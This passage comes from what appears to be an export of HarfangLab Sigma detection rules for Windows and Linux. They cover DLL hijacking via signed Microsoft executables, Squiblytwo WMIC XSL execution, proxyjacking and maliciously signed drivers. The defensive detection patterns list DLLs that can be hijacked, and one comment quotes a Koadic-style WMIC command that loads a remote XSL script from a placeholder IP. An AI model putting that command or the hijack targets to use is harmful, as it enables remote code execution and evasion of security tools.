Windows for Protected Process error reporting.\nAttackers can abuse this legitimate tool by copying a vulnerable version of it to alternative locations for process memory dumping, therefore bypassing security controls on protected processes.\nIt is recommended to investigate the parent process and analyze any generated dump files for credential harvesting activities.\n", "rule_creation_date": "2025-09-15", "rule_modified_date": "2025-10-01", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.credential_access" ], "rule_technique_tags": [ "attack.t1003", "attack.t1003.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "1a60aaa8-4707-470a-bfa7-fcd2a9b3c464", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.586727Z", "creation_date": "2026-03-23T11:45:34.586731Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.586739Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://wietze.github.io/blog/save-the-environment-variables", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_wordpad.yml", "content": "title: DLL Hijacking via WORDPAD.exe\nid: 1a60aaa8-4707-470a-bfa7-fcd2a9b3c464\ndescription: |\n Detects potential Windows DLL Hijacking via WORDPAD.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'WORDPAD.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcrypt.dll'\n - '\\dataexchange.dll'\n - '\\msctf.dll'\n - '\\msxml3.dll'\n - '\\netprofm.dll'\n - '\\npmproxy.dll'\n - '\\uiribbon.dll'\n - '\\windowscodecs.dll'\n - '\\edputil.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files\\Microsoft\\Edge\\Application\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "1a60aaa8-4707-470a-bfa7-fcd2a9b3c464", "rule_name": "DLL Hijacking via WORDPAD.exe", "rule_description": "Detects potential Windows DLL Hijacking via WORDPAD.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2022-09-15", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "1a6ba792-4593-442a-9a80-d38ce5e97360", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.595992Z", "creation_date": "2026-03-23T11:45:34.595996Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.596004Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmic", "https://attack.mitre.org/techniques/T1220/", "https://www.netskope.com/blog/you-can-run-but-you-cant-hide-advanced-emotet-updates" ], "name": "t1218_squiblytwo.yml", "content": "title: Possible Squiblytwo Attack Detected\nid: 1a6ba792-4593-442a-9a80-d38ce5e97360\ndescription: |\n Detects the usage of a custom formatter to gain remote execution through WMIC execution.\n WMIC can take an XSL script to format the data, which may execute a malicious JScript. This technique is also known as Squiblytwo.\n It is recommended to check for suspicious activities by the current process or any of its children.\nreferences:\n - https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmic\n - https://attack.mitre.org/techniques/T1220/\n - https://www.netskope.com/blog/you-can-run-but-you-cant-hide-advanced-emotet-updates\ndate: 2021/02/08\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.defense_evasion\n - attack.t1220\n - attack.t1218\n - attack.t1059.007\n - attack.t1047\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Script.XSL\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # wmic os get /FORMAT:\"http://xxx.xxx.xxx.xxx/keswD.xsl\" (Koadic)\n selection_1:\n - Image|endswith: '\\wmic.exe'\n - OriginalFileName: 'wmic.exe'\n selection_2:\n - CommandLine|contains:\n - '/format '\n - '/format:'\n - '/format :'\n - '/ format:'\n - '/ format :'\n - \"/'format':\"\n - \"/'format' :\"\n - \"/ 'format':\"\n - \"/ 'format' :\"\n - '/\"format\":'\n - '/\"format\" :'\n - '/ \"format\":'\n - '/ \"format\" :'\n\n exclusion_fp:\n CommandLine|contains:\n # Builtins formats\n - '/format:list'\n - '/ format:list'\n - '/format: list'\n - '/format:table'\n - '/ format:table'\n - '/format: table'\n - '/format:CSV'\n - '/ format:CSV'\n - '/format: CSV'\n - '/format:rawxml'\n - '/ format:rawxml'\n - '/format: rawxml'\n - '/format:mof'\n - '/ format:mof'\n - '/format: mof'\n - '/format:htable'\n - '/ format:htable'\n - '/format: htable'\n - '/format:hform'\n - '/ format:hform'\n - '/format: hform'\n - '/format:texttable'\n - '/ format:texttable'\n - '/format: texttable'\n - '/format:textvaluelist'\n - '/ format:textvaluelist'\n - '/format: textvaluelist'\n - '/format:htable-sortby'\n - '/ format:htable-sortby'\n - '/format: htable-sortby'\n - '/format:value'\n - '/ format:value'\n - '/format: value'\n - \"/format:'lib/csv.xsl'\"\n - '/format:?:\\Windows\\System32\\wbem\\' # /format:C:\\Windows\\System32\\wbem\\en-us\\csv\n\n exclusion_meshagent:\n # C:\\Program Files\\Mesh Agent\\MeshAgent.exe\n # ?:\\Program Files (x86)\\Mesh Agent\\MeshAgent.exe\n # D:\\MeshAgent.exe\n ParentImage|endswith: '\\MeshAgent.exe'\n CommandLine:\n - 'wmic diskdrive LIST BRIEF /FORMAT:?:\\Windows\\system32\\wbem\\\\??-??\\csv' # (fr-FR, en-US)\n - 'wmic PATH Win32_VideoController GET Name,CurrentHorizontalResolution,CurrentVerticalResolution /FORMAT:?:\\Windows\\system32\\wbem\\\\??-??\\csv'\n - 'wmic CPU LIST BRIEF /FORMAT:?:\\Windows\\system32\\wbem\\\\??-??\\csv'\n - 'wmic PARTITION LIST /FORMAT:?:\\Windows\\system32\\wbem\\\\??-??\\csv'\n - 'wmic OS GET /FORMAT:?:\\Windows\\system32\\wbem\\\\??-??\\csv'\n - 'wmic MEMORYCHIP LIST /FORMAT:?:\\Windows\\system32\\wbem\\\\??-??\\csv'\n - 'wmic ComputerSystem get PCSystemType /FORMAT:?:\\Windows\\system32\\wbem\\\\??-??\\csv'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "1a6ba792-4593-442a-9a80-d38ce5e97360", "rule_name": "Possible Squiblytwo Attack Detected", "rule_description": "Detects the usage of a custom formatter to gain remote execution through WMIC execution.\nWMIC can take an XSL script to format the data, which may execute a malicious JScript. This technique is also known as Squiblytwo.\nIt is recommended to check for suspicious activities by the current process or any of its children.\n", "rule_creation_date": "2021-02-08", "rule_modified_date": "2025-04-14", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.execution" ], "rule_technique_tags": [ "attack.t1047", "attack.t1059.007", "attack.t1218", "attack.t1220" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "1a7b3a94-a404-42ce-ba50-a9808950b58a", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.597287Z", "creation_date": "2026-03-23T11:45:34.597290Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.597298Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.cadosecurity.com/blog/from-automation-to-exploitation-the-growing-misuse-of-selenium-grid-for-cryptomining-and-proxyjacking", "https://www.trendmicro.com/en_gb/research/23/b/hijacking-your-bandwidth-how-proxyware-apps-open-you-up-to-risk.html", "https://attack.mitre.org/techniques/T1496/" ], "name": "t1496_traffmonetizer.yml", "content": "title: Traffmonetizer Executed\nid: 1a7b3a94-a404-42ce-ba50-a9808950b58a\ndescription: |\n Detects the usage of Traffmonetizer, a tool that allows users to monetize their unused Internet bandwidth by sharing it with companies or services via a peer-to-peer (P2P) network.\n Attackers can use this tool to perform Proxyjacking, a form of cyber exploitation where an attacker hijacks a user's Internet connection to use it as a proxy server for malicious purposes or illegal monetization.\n It is recommended to verify if the usage of this tool is legitimate.\nreferences:\n - https://www.cadosecurity.com/blog/from-automation-to-exploitation-the-growing-misuse-of-selenium-grid-for-cryptomining-and-proxyjacking\n - https://www.trendmicro.com/en_gb/research/23/b/hijacking-your-bandwidth-how-proxyware-apps-open-you-up-to-risk.html\n - https://attack.mitre.org/techniques/T1496/\ndate: 2024/09/26\nmodified: 2025/02/18\nauthor: HarfangLab\ntags:\n - attack.impact\n - attack.t1496\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.NetworkActivity\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n CommandLine|contains: ' start accept --token'\n\n condition: selection\nlevel: high\nconfidence: strong", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "1a7b3a94-a404-42ce-ba50-a9808950b58a", "rule_name": "Traffmonetizer Executed", "rule_description": "Detects the usage of Traffmonetizer, a tool that allows users to monetize their unused Internet bandwidth by sharing it with companies or services via a peer-to-peer (P2P) network.\nAttackers can use this tool to perform Proxyjacking, a form of cyber exploitation where an attacker hijacks a user's Internet connection to use it as a proxy server for malicious purposes or illegal monetization.\nIt is recommended to verify if the usage of this tool is legitimate.\n", "rule_creation_date": "2024-09-26", "rule_modified_date": "2025-02-18", "rule_os": "linux", "rule_status": null, "rule_tactic_tags": [ "attack.impact" ], "rule_technique_tags": [ "attack.t1496" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "1a8169a6-7d34-4131-9f89-3783ecb9ae0c", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.601095Z", "creation_date": "2026-03-23T11:45:34.601098Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.601106Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://github.com/xforcered/WFH", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_ieunatt.yml", "content": "title: DLL Hijacking via ieunatt.exe\nid: 1a8169a6-7d34-4131-9f89-3783ecb9ae0c\ndescription: |\n Detects potential Windows DLL Hijacking via ieunatt.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ieunatt.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dbgcore.DLL'\n - '\\dbghelp.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "1a8169a6-7d34-4131-9f89-3783ecb9ae0c", "rule_name": "DLL Hijacking via ieunatt.exe", "rule_description": "Detects potential Windows DLL Hijacking via ieunatt.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "1a8b04c9-09a5-479f-8bf1-4cf580c1eec9", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.097553Z", "creation_date": "2026-03-23T11:45:34.097555Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.097559Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_w32tm.yml", "content": "title: DLL Hijacking via w32tm.exe\nid: 1a8b04c9-09a5-479f-8bf1-4cf580c1eec9\ndescription: |\n Detects potential Windows DLL Hijacking via w32tm.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'w32tm.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\IPHLPAPI.DLL'\n - '\\logoncli.dll'\n - '\\netutils.dll'\n - '\\NTDSAPI.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "1a8b04c9-09a5-479f-8bf1-4cf580c1eec9", "rule_name": "DLL Hijacking via w32tm.exe", "rule_description": "Detects potential Windows DLL Hijacking via w32tm.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "1ab2fc0d-1160-461b-99f6-f7936f152d34", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.094714Z", "creation_date": "2026-03-23T11:45:34.094716Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.094720Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://securityintelligence.com/posts/windows-features-dll-sideloading/", "https://github.com/xforcered/WFH", "https://wietze.github.io/blog/save-the-environment-variables", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_notepad.yml", "content": "title: DLL Hijacking via notepad.exe\nid: 1ab2fc0d-1160-461b-99f6-f7936f152d34\ndescription: |\n Detects potential Windows DLL Hijacking via notepad.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/10/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'notepad.exe'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith:\n - '\\cabview.dll'\n - '\\comdlg32.dll'\n - '\\cscobj.dll'\n - '\\cscui.dll'\n - '\\dataexchange.dll'\n - '\\davclnt.dll'\n - '\\drprov.dll'\n - '\\explorerframe.dll'\n - '\\mmdevapi.dll'\n - '\\networkexplorer.dll'\n - '\\ntlanman.dll'\n - '\\ntshrui.dll'\n - '\\p9np.dll'\n - '\\propsys.dll'\n - '\\shell32.dll'\n - '\\structuredquery.dll'\n - '\\windows.storage.dll'\n - '\\windows.storage.search.dll'\n - '\\windowscodecs.dll'\n - '\\wpdshext.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Google\\Chrome\\Application\\'\n - '?:\\Program Files (x86)\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files (x86)\\Mozilla Firefox\\'\n - '?:\\Program Files\\Google\\Chrome\\Application\\'\n - '?:\\Program Files\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files\\Mozilla Firefox\\'\n - '?:\\Program Files\\WindowsApps\\Microsoft.WindowsNotepad_'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "1ab2fc0d-1160-461b-99f6-f7936f152d34", "rule_name": "DLL Hijacking via notepad.exe", "rule_description": "Detects potential Windows DLL Hijacking via notepad.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2022-09-15", "rule_modified_date": "2025-10-16", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "1b15c2a0-d1d2-4628-a592-e6c9c314baff", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.625804Z", "creation_date": "2026-03-23T11:45:34.625806Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.625810Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://blog.talosintelligence.com/old-certificate-new-signature/", "https://www.bitdefender.com/files/News/CaseStudies/study/421/Bitdefender-PR-Whitepaper-IndEs-creat6269-en-EN.pdf", "https://twitter.com/th3_protoCOL/status/1587823143854698497", "https://blogs.blackberry.com/en/2022/11/romcom-spoofing-solarwinds-keepass", "https://www.trendmicro.com/en_us/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html", "https://twitter.com/pr0xylife/status/1595096438798696448", "https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware", "https://twitter.com/ESETresearch/status/1594937059348992001", "https://twitter.com/jaydinbas/status/1646475092006785027", "https://www.trendmicro.com/en_us/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver.html", "https://attack.mitre.org/techniques/T1553/002/" ], "name": "t1553_002_driver_malicious_certificate.yml", "content": "title: Driver Loaded Signed with Malicious Certificate\nid: 1b15c2a0-d1d2-4628-a592-e6c9c314baff\ndescription: |\n Detects the loading of drivers signed with a certificate that was used by malicious actors.\n This can be indicative of a malicious actor trying to evade EDR/AV solutions with a forged signature.\n It is recommended to analyze the loaded driver for malicious contents.\nreferences:\n - https://blog.talosintelligence.com/old-certificate-new-signature/\n - https://www.bitdefender.com/files/News/CaseStudies/study/421/Bitdefender-PR-Whitepaper-IndEs-creat6269-en-EN.pdf\n - https://twitter.com/th3_protoCOL/status/1587823143854698497\n - https://blogs.blackberry.com/en/2022/11/romcom-spoofing-solarwinds-keepass\n - https://www.trendmicro.com/en_us/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html\n - https://twitter.com/pr0xylife/status/1595096438798696448\n - https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware\n - https://twitter.com/ESETresearch/status/1594937059348992001\n - https://twitter.com/jaydinbas/status/1646475092006785027\n - https://www.trendmicro.com/en_us/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver.html\n - https://attack.mitre.org/techniques/T1553/002/\ndate: 2022/07/21\nmodified: 2025/12/30\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1553.002\n - classification.Windows.Source.DriverLoad\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: driver_load\n product: windows\ndetection:\n selection:\n DriverSignatureSignerThumbprint:\n # https://www.bitdefender.com/files/News/CaseStudies/study/421/Bitdefender-PR-Whitepaper-IndEs-creat6269-en-EN.pdf\n - '7C496F5FE65803A45AD7BD8DA5F59B8548E08E0A'\n # https://twitter.com/th3_protoCOL/status/1587823143854698497\n - 'FDD415C4B8A6983CFA982ECABB6D9A55BFD9F623'\n # https://blogs.blackberry.com/en/2022/11/romcom-spoofing-solarwinds-keepass\n - 'F55B2365D9E837777B760305C78E674B686E5834'\n # https://www.trendmicro.com/en_us/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html\n - 'C7939F8303CA22EFFB28246E970B13BEE6CB8043'\n - 